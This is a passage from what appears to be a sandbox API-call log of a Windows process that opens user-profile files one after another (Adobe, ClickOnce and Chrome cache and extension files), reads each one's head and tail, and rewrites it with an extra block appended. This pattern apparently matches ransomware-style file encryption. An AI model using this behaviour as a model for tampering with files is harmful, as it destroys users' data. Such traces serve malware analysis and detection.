(hMutex=0x168) returned 1 [0162.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x86.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0162.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x86.exe", cchWideChar=16, lpMultiByteStr=0x1f88d34, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcredist_x86.exe", lpUsedDefaultChar=0x0) returned 16 [0162.399] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0162.426] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x70080 [0162.426] ReadFile (in: hFile=0x210, lpBuffer=0x3d1eb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x3d1eb58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.442] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x70080 [0162.443] WriteFile (in: hFile=0x210, lpBuffer=0x3cfeaf8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfeaf8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.443] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0162.443] WriteFile (in: hFile=0x210, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0162.444] CloseHandle (hObject=0x210) returned 1 [0162.444] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0162.445] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.445] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x21cdb [0162.445] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.445] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.446] ReleaseMutex (hMutex=0x168) returned 1 [0162.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeSysFnt10.lst", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0162.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeSysFnt10.lst", cchWideChar=17, lpMultiByteStr=0x1f88d34, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeSysFnt10.lst", lpUsedDefaultChar=0x0) returned 17 [0162.446] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0162.460] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x20cdb [0162.460] ReadFile (in: hFile=0x210, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.465] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x20cdb [0162.466] WriteFile (in: hFile=0x210, lpBuffer=0x3d1dcb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d1dcb8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.467] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0162.467] WriteFile (in: hFile=0x210, lpBuffer=0x3d0fb28*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb28*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0162.467] CloseHandle (hObject=0x210) returned 1 [0162.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0162.468] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.468] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3c50 [0162.468] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.468] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.468] ReleaseMutex (hMutex=0x168) returned 1 [0162.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clickonce_bootstrap.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0162.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clickonce_bootstrap.exe", cchWideChar=23, lpMultiByteStr=0x1f88bcc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="clickonce_bootstrap.exe", lpUsedDefaultChar=0x0) returned 23 [0162.469] ReadFile (in: hFile=0x210, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.476] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2c50 [0162.476] ReadFile (in: hFile=0x210, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.487] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2c50 [0162.487] WriteFile (in: hFile=0x210, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.489] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0162.489] WriteFile (in: hFile=0x210, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0162.489] CloseHandle (hObject=0x210) returned 1 [0162.489] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0162.490] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.490] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x38b0 [0162.490] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.490] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.491] ReleaseMutex (hMutex=0x168) returned 1 [0162.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0162.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", cchWideChar=66, lpMultiByteStr=0x1fac5ac, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpUsedDefaultChar=0x0) returned 66 [0162.491] ReadFile (in: hFile=0x210, lpBuffer=0x3cfe0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfe0f8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.503] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x28b0 [0162.503] ReadFile (in: hFile=0x210, lpBuffer=0x3cfe0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfe0f8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.504] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x28b0 [0162.504] WriteFile (in: hFile=0x210, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.505] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0162.505] WriteFile (in: hFile=0x210, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0162.505] CloseHandle (hObject=0x210) returned 1 [0162.505] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0162.506] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.506] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x80170 [0162.506] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.506] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.506] ReleaseMutex (hMutex=0x168) returned 1 [0162.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="index", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0162.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="index", cchWideChar=5, lpMultiByteStr=0x1f7ad44, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="index", lpUsedDefaultChar=0x0) returned 5 [0162.507] ReadFile (in: hFile=0x210, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0162.509] ReadFile (in: hFile=0x210, lpBuffer=0x2840938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.510] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7f170 [0162.510] ReadFile (in: hFile=0x210, lpBuffer=0x3cfe0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfe0f8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.512] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7f170 [0162.512] WriteFile (in: hFile=0x210, lpBuffer=0x2850968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2850968*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.513] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0162.513] WriteFile (in: hFile=0x210, lpBuffer=0x27e0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x27e0018*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0162.514] WriteFile (in: hFile=0x210, lpBuffer=0x27e0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x27e0018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0162.514] CloseHandle (hObject=0x210) returned 1 [0162.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0162.515] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.515] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x9a [0162.515] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0162.515] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.516] ReleaseMutex (hMutex=0x168) returned 1 [0162.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOG", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0162.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOG", cchWideChar=3, lpMultiByteStr=0x1f7ad5c, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOG", lpUsedDefaultChar=0x0) returned 3 [0162.516] ReadFile (in: hFile=0x210, lpBuffer=0x26b9108, nNumberOfBytesToRead=0x9a, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b9108*, lpNumberOfBytesRead=0x311f2bc*=0x9a, lpOverlapped=0x0) returned 1 [0162.517] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0162.517] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x622, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x622, lpOverlapped=0x0) returned 1 [0162.517] CloseHandle (hObject=0x210) returned 1 [0162.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0163.075] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0163.075] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5f [0163.075] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0163.075] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0163.075] ReleaseMutex (hMutex=0x168) returned 1 [0163.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.js", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0163.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.js", cchWideChar=7, lpMultiByteStr=0x1f7ad44, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="main.js", lpUsedDefaultChar=0x0) returned 7 [0163.075] ReadFile (in: hFile=0x210, lpBuffer=0x1f56af8, nNumberOfBytesToRead=0x5f, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56af8*, lpNumberOfBytesRead=0x311f2bc*=0x5f, lpOverlapped=0x0) returned 1 [0163.077] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0163.077] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e7, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x5e7, lpOverlapped=0x0) returned 1 [0164.888] CloseHandle (hObject=0x210) returned 1 [0164.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.913] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.913] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x112 [0164.913] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.913] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.913] ReleaseMutex (hMutex=0x168) returned 1 [0164.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.913] ReadFile (in: hFile=0x210, lpBuffer=0x1ef2258, nNumberOfBytesToRead=0x112, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2258*, lpNumberOfBytesRead=0x311f2bc*=0x112, lpOverlapped=0x0) returned 1 [0164.914] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0164.914] WriteFile (in: hFile=0x210, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x69a, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x311f2d0*=0x69a, lpOverlapped=0x0) returned 1 [0164.915] CloseHandle (hObject=0x210) returned 1 [0164.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0164.916] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.917] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xde [0164.917] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0164.917] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.917] ReleaseMutex (hMutex=0x168) returned 1 [0164.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.917] ReadFile (in: 